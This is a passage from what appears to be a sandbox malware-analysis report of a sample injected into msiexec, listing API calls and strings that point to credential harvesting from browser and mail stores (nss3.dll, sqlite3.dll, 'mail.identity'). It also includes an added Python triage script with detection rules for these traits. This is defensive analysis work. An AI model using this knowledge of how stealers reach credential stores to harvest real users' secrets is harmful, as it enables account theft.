                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
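The blocks in this listing are flat text, and the patterns that matter for triage (the FindResourceA, SizeofResource, LoadResource, LockResource chain just above, the `mail.identity` string two blocks earlier, the SQLite error messages further up) are easier to pick out once each record is structured. The Python below is an added example written for this page; it is not Joe Sandbox code and not code from the sample. It parses blocks in exactly the format shown here (an `APIs` header opens each record; `•` lines under `APIs`, `Strings` and `Similarity` carry the call, string and ID fields) and then applies three heuristics that are the editor's own assumptions, not conclusions the report draws: the resource-loading chain is how a binary reads an embedded payload, `mail.identity` is the prefs.js key prefix Thunderbird uses for mail accounts, and `too many SQL variables` / `recovered %d pages from %s` are SQLite's own error strings, so their presence means SQLite is linked into the dump. `SAMPLE_REPORT` is a constructed excerpt of three blocks copied from this report.

```python
"""Triage helper for Joe Sandbox 'Executed Functions' blocks like the ones above.

Added example for this page, not Joe Sandbox code. SAMPLE_REPORT is a constructed
excerpt of three blocks copied from this report; RULES are the editor's own
heuristics, not conclusions the report draws.
"""
import re
from dataclasses import dataclass, field

SAMPLE_REPORT = """\
APIs
Strings
• too many SQL variables, xrefs: 0042C6FD
• variable number must be between ?1 and ?%d, xrefs: 0042C5C2
Memory Dump Source
• Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
Similarity
• API ID: memset
• String ID: too many SQL variables$variable number must be between ?1 and ?%d
• API String ID: 2221118986-515162456
APIs
Strings
Similarity
• API ID: _strcmpi
• String ID: C@$mail.identity
• API String ID: 1439213657-721921413
APIs
• FindResourceA.KERNEL32(?,?,?), ref: 00410C75
• SizeofResource.KERNEL32(?,00000000), ref: 00410C86
• LoadResource.KERNEL32(?,00000000), ref: 00410C96
• LockResource.KERNEL32(00000000), ref: 00410CA1
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Matches "• memset.MSVCRT ref: 004048C2", "• memcpy.MSVCRT(?,...), ref: 004048FC" and
# "• Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(...), ref: 00410B16".
API_LINE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[^.\s(]+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
STRING_LINE = re.compile(r"^•\s+(?P<text>.*), xrefs: (?P<xref>[0-9A-F]+)$")
FIELD_LINE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # (name, module, ref, called_from_subcall)
    strings: list = field(default_factory=list)  # (text, xref)
    fields: dict = field(default_factory=dict)   # "API ID", "String ID", "Opcode ID", ...

    def api_names(self, include_subcalls=False):
        return {n for n, _mod, _ref, sub in self.apis if include_subcalls or not sub}


def parse_blocks(text):
    """Split report text into FunctionBlocks; each 'APIs' header opens a new record."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionBlock()
                blocks.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        if section == "APIs" and (m := API_LINE.match(line)):
            current.apis.append((m["name"], m["mod"], m["ref"], m["sub"] is not None))
        elif section == "Strings" and (m := STRING_LINE.match(line)):
            current.strings.append((m["text"], m["xref"]))
        elif section == "Similarity" and (m := FIELD_LINE.match(line)):
            current.fields[m["key"]] = m["value"]
    return blocks


def _texts(block):
    # Strings section entries plus the '$'-joined "String ID" mnemonic from Similarity.
    return [t for t, _ in block.strings] + [block.fields.get("String ID", "")]


# Editor's heuristics (assumptions, not report findings): what each pattern usually means.
RULES = [
    ("embedded-resource extraction chain",  # FindResource -> LoadResource -> LockResource
     lambda b: {"LoadResource", "LockResource"} <= b.api_names()
     and any(n.startswith("FindResource") for n in b.api_names())),
    ("Thunderbird prefs.js key 'mail.identity'",  # mail-account enumeration
     lambda b: any("mail.identity" in t for t in _texts(b))),
    ("statically linked SQLite (its own error text)",  # profile databases are SQLite
     lambda b: any(t.startswith(("too many SQL variables", "recovered %d pages from"))
                   for t in _texts(b))),
]


def triage(text):
    """Return one finding per block that trips a rule, in report order."""
    findings = []
    for block in parse_blocks(text):
        hits = [name for name, pred in RULES if pred(block)]
        if hits:
            findings.append({"api_id": block.fields.get("API ID", ""),
                             "first_ref": block.apis[0][2] if block.apis else None,
                             "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_REPORT):
        print(finding)
```

The `API ID` field is kept because, as the records above show, it is a compact mnemonic built from the call names (`Resource$FindLoadLockSizeof`, `memset$memcpy`), so it identifies a block even when the `APIs` list itself is empty, as in the `_strcmpi` record. Subcall entries are parsed but excluded from `api_names()` by default, so a rule fires on what the function itself calls rather than on everything reachable from it.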
                                                              APIs
                                                              • memset.MSVCRT ref: 00406640
                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                              • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset$memcmp
                                                              • String ID: Ul@
                                                              • API String ID: 270934217-715280498
                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                              APIs
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                              • sprintf.MSVCRT ref: 0040B929
                                                              • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                              • sprintf.MSVCRT ref: 0040B953
                                                              • _mbscat.MSVCRT ref: 0040B966
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                              • String ID:
                                                              • API String ID: 203655857-0
                                                              • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                              • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                              • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                              • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                              APIs
                                                              • memset.MSVCRT ref: 0040ADE8
                                                              • memset.MSVCRT ref: 0040ADFE
                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                              • sprintf.MSVCRT ref: 0040AE28
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                              • String ID: </%s>
                                                              • API String ID: 3699762281-259020660
                                                              • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                              • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                              • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                              • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                              APIs
                                                                • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                              Strings
                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                              • String ID: recovered %d pages from %s
                                                              • API String ID: 985450955-1623757624
                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _ultoasprintf
                                                              • String ID: %s %s %s
                                                              • API String ID: 432394123-3850900253
                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                              APIs
                                                              • memset.MSVCRT ref: 00409919
                                                              • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: N\@
                                                              • API String ID: 568519121-3851889168
                                                              • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                              • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                              • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                              APIs
                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                              • sprintf.MSVCRT ref: 0040909B
                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                              • String ID: menu_%d
                                                              • API String ID: 1129539653-2417748251
                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                              Strings
                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _msizerealloc
                                                              • String ID: failed memory resize %u to %u bytes
                                                              • API String ID: 2713192863-2134078882
                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                              APIs
                                                                • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                              • strrchr.MSVCRT ref: 00409808
                                                              • _mbscat.MSVCRT ref: 0040981D
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName_mbscatstrrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 3334749609-1948609170
                                                              • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                              • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                              • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                              APIs
                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 004070FA
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$_mbscpystrlen
                                                              • String ID: sqlite3.dll
                                                              • API String ID: 1983510840-1155512374
                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                              APIs
                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID: A4@$Server Details
                                                              • API String ID: 1096422788-4071850762
                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                              • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                              • memset.MSVCRT ref: 0042C932
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                              • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                              • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040849A
                                                              • memset.MSVCRT ref: 004084D2
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,67E97B60,?,00000000), ref: 0040858F
                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,67E97B60,?,00000000), ref: 004085BA
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                              • String ID:
                                                              • API String ID: 3110682361-0
                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID:
                                                              • API String ID: 3510742995-0
                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                              APIs
                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                              • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                              • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040797A
                                                              • free.MSVCRT ref: 0040799A
                                                                • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                              • free.MSVCRT ref: 004079BD
                                                              • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocstrlen
                                                              • String ID:
                                                              • API String ID: 3669619086-0
                                                              • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                              • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                              • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00403F8E,0044C530), ref: 00408D5C
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D7A
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D98
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408DA8
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: 1226329fef66c94fa82ba57e72c46c46c6e0dffed67700a76cfead9af7fedf55
                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09